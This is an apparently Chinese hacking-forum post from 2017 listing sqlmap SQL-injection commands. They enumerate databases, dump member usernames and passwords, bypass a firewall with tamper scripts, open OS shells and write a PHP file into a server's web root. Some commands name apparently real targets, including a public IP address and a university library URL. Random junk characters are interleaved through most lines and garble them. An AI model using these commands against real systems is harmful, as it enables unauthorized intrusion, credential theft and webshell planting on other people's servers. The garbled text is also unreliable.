找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1865|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap' o( a' R: G: b4 U# b. W
8 g$ G" K" k+ U$ C: v
update :::::>     in the folder   after  execute    following   order : svn update
# e+ ?* c7 z& o1 W4 s" ^2 Q( m$ X2 d) e
sqlmap.py -r 1.txt --current-db
3 B" @3 \' O3 z2 ~9 m+ {* ^* X4 r7 q( v) q, _/ {
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
" i% \" p; F8 [9 v: g# i8 o
+ E# I% R6 B3 c- R( M8 u! S==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
9 U5 a1 S. f. l' K7 Q2 ~; d& l猜解数据库
$ {4 U  {  _+ N, T5 X1 N( j: @./sqlmap.py -u "injection-url" --dbs1 ~" u0 A# h) s
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
% }, S% z! V/ D, S* A! F. I' A- M4 j" \, ]& M5 s* a+ y* O
猜解表名
, W7 C  z7 l9 y7 E5 U./sqlmap.py -u "injection-url" -D database_name --tables5 v) R& J  m% E- R
! a' a6 G4 D# H2 h
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"- t6 _4 \' h4 O* `: _0 b% M) ?
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
, O3 m- ~' q; K6 @# u9 _4 s' S. D" c% a  e
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
. d) g. p/ ^* F. m
4 B& v6 o( X; B4 B$ Ssqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"+ z) r* d) r- L6 Q5 o5 r# a: r7 B0 E( C
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"6 M9 j6 _+ w6 l! p- l4 c! X
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" , Q, z, z1 o3 R" ^3 A4 _. N
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
- K6 c( Z0 @8 g( B5 z( g; g/ E
% Y% }& |1 p  J/ l* E$ |+ b( ~sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
& o( y) R7 R  D0 I; e6 hsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
0 [( \/ R$ k7 m* Y3 `: {sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
  P7 m8 B3 z9 r6 L( ~$ q; @sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py") C* ~! c  G7 t" f9 v
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump! ?6 v" x5 |4 s* b( e" q

, Y& g% i0 a: |# @sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
, _! P6 k3 e( }. p4 gsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
" B6 D, N' z4 C% D7 }; y8 d1 Y  c4 P: q5 Z4 q' f7 V) o; Z
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst". T3 F6 o8 K5 V; j6 E
猜解列名
6 N( U4 U% k% O9 m5 w# |: y5 E./sqlmap.py -u "injection-url" -D database_name -T table_name --columns& H0 Z% M' `$ L" `+ I& i+ n
8 T+ f5 X* n7 U  i7 E
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" " x. g' T1 G% B$ E: k
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
+ o9 j3 t" ^) V7 O7 {' l+ `2 U# gsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"# k2 X2 K, Q) J9 q6 i
0 k/ {( b( F4 E! @, q& Y4 a! }4 a
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"! j! g- t; [2 g) q: Y7 O
&submit=Go
( o( I4 q# f# X7 a5 ?3 C1 N$ p猜解值
6 ~: k: `7 z, r+ x  e- d  h./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump/ @7 u; z  G, U$ ?6 X
========================================================
# s7 A7 c% B+ B3 _6 K- ~% h搜索表名中包括mana字符的+ V4 D& ?. m* v4 j8 c2 n' ^1 Z
/sqlmap.py -u "injection-url" -T mana --search, O" m$ q) E% ]& z. K" _7 K7 w0 i9 n
返回一个交互式sql shell
0 ?# D2 U+ R4 {( K8 h2 J2 F/sqlmap.py -u "injection-url" --sql-shell
- J) Y$ r2 H8 x读取指定文件(需权限)
! S5 A4 }9 V) T. Z) S5 N/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"& q3 k8 Y7 Z! _6 w6 f$ y) }& R
查看当前 用户 及 数据库
: P2 d- f3 K8 N/sqlmap.py -u "injection-url" --current-user --current-db
! l+ l! L: _4 m# }$ y+ }2 }本地文件 写入 远程目标绝对路径) K  a3 x) m! P- p- B. k
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
0 [  Q6 G# _8 m, Z( J; _5 Rsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" " y$ _) e/ o  A7 r" r1 ]# X" h) C( S. p1 ]

6 ?; R- Y" q; m; ?- L& r! dsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
" W  L5 Q$ T, z+ V: s查看某用的权限
/ P* c$ J6 I: R6 ^2 c/sqlmap.py -u "injection-url" --privileges -U root
( Z7 y& p, f+ X  s' y查看当前用户是否为dba
$ J1 X2 ^5 g, Y8 j. l# @/sqlmap.py -u "injection-url" --is-dba' n' l( {$ S. r& ^6 D
读取所有数据库用户或指定数据库用户的密码
( r+ M6 g5 H' f2 L; Q+ |sqlmap.py -r 1.txt --users --passwords4 }$ B8 C. a, r+ f5 L
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
5 ^% Q1 N* h' t4 C7 f. W. [# [$ m+ W2 ]
/sqlmap.py -u "injection-url" --passwords -U root
$ \: S7 p: n, d- \: R8 D3 d8 @7 A5 ~. `% ~2 U
--start&&--stop 与 --first&&--last 的区别$ ]# b6 b- v8 d8 Z) ?0 |6 ~
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
1 a1 g! i6 o* I! p) g
# R% Q( O3 R- @; h8 w: z从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)' q& g" B1 T  I, {5 Y! T
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
% [0 {9 x) C6 ?& Q/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
5 r5 Q2 i% V0 N9 z* F* j6 e( h. C+ `! n% z" @4 l9 H, n7 Z/ P
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)* p& @; K) N4 ^5 c
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"+ y0 K7 g, Y- `) ?

$ W8 O8 M3 ?. g* y! W' }. y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表